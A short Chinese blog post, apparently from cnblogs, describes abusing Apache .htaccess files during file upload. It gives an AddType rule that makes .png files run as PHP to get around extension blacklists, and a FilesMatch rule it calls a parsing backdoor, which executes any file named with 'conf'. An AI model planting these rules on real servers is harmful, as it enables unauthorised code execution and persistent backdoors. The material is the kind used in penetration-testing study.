.htaccess文件解析php
1.黑名单绕过
上传.htaccess文件至网站根目录
内容为
AddType application/x-httpd-php .png
把.png文件后缀解析为php
2.留解析后门
可以在.htaccess 加入php解析规则
类似于把文件名包含特定字符串的文件解析成php
.htaccess内容为
<FilesMatch "conf">
SetHandler application/x-httpd-php
</FilesMatch>
这样config.txt这个文件就会解析为php
本文来自博客园,作者:Yemoox,转载请注明原文链接:https://www.cnblogs.com/yemoox/p/14913218.html

浙公网安备 33010602011771号